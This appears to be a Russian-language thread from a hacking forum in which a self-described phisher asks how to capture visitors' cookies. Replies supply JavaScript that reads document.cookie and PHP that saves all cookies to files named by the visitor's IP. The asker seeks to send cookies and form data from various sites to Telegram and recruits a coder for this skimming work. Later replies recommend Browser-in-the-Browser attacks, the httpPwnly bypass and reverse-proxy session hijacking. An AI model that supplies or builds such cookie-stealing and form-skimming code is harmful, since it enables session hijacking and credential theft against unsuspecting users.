Доброго времени суток
не подскажите как получить куки посетителя сайта и передать их в массив ? не используя реверс прокси
не подскажите как получить куки посетителя сайта и передать их в массив ? не используя реверс прокси
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как получить куки посетителя ?
- Автор темы frant
- Дата начала
try it with selenium
JavaScript:
var cookie_dict = new Map();
var splitted_cookies = document.cookie.split(";");
for(var i = 0; i < splitted_cookies.length; i++){
var splitted_single_cookie = splitted_cookies[i].split("=");
cookie_dict.set(splitted_single_cookie[0], splitted_single_cookie[1]);
}
for (var [key, value] of cookie_dict) {
console.log(key + " = " + value);
}
А причем здесь вообще реверс прокси?
Это 'транспорт' для http какое он значение имеет в данном контексте к кукам?
Это 'транспорт' для http какое он значение имеет в данном контексте к кукам?
а как сделать так чтобы эти куки сохранялись на моём сервере в отдельный текстовый файл, а название файла было ip юзера?
- Автор темы
- Добавить закладку
- #6
пока дошел до понимания что полноценно куки посетителя с фиша никак не сграбить. Так что пошел другим путем . создаю свои куки через автоматизацию в антике и далее грею их. По другому решения не нашел (
Ты можешь получить только те куки, что в пределах твоего домена. Нельзя получить вообще любые куки пользователя из его браузера просто так, это как бы изначально очевидно)
ну это понятно, хотелось бы на практике это реализовать, чтобы эти куки сохранялись в текстовике либо же отправлялись на бота в ТГ
Так а в чем сложность?
Как-то так:
$ip = $_SERVER['REMOTE_ADDR'];
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$cook = $cookie_name . "=" . $cookie_value;
file_put_contents($ip, $cook, FILE_APPEND | LOCK_EX);
}
Вообще вопрос настолько простой, что ты не пробовал его ну погуглить что ли?)
Как-то так:
$ip = $_SERVER['REMOTE_ADDR'];
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$cook = $cookie_name . "=" . $cookie_value;
file_put_contents($ip, $cook, FILE_APPEND | LOCK_EX);
}
Вообще вопрос настолько простой, что ты не пробовал его ну погуглить что ли?)
в том то и дело что гуглил, но видимо не настолько продуктивно, спс
еще такой вопрос: если форма логина идет редиректом с основного сайта на другой, а есть доступ только к основному сайту, можно ли как то перехватить куки логина с другого сайта? например если сделать этот редирект в iframe? чтобы брались куки залогирования с фрейма. В общем ищу кодера кто не плохо шарит в коде, кто сидит без дела пишите в ПМ, необходимо будет устанавливать код для отправки данных с форм различных сайтов в телеграмм(а так же по возможности вышеуказанные куки), доход с реализации такой инфы. человек нужен с частым онлайном чтобы был всегда на связи.
Последнее редактирование:
Если попытка своровать куки воспроизводится на вашем собственном сайте, имеет смысл использовать атаку BITB (Browser In The Browser), об этом уже написана полезная статья, и готовый инструмент, который вы могли бы использовать в вашем случае. Хотя все более-менее современные сайты имеют на куках логина флаг httpOnly, и перехватить их даже с помощью XSS уязвимости представляется довольно сложной задачей. Для обхода вы можете использовать httpPwnly, тем не менее, этот способ остаётся не таким продуктивным как того хотелось-бы.
browser in the browser wouldn't work as there is server side protection allowing the site to load via iframe and the cookie would still be on the client site and not accessible.
in this case, only a reverse proxy could hijack the session and/or cookies but it would have to bypass server-side anti-MITM protocols set in place.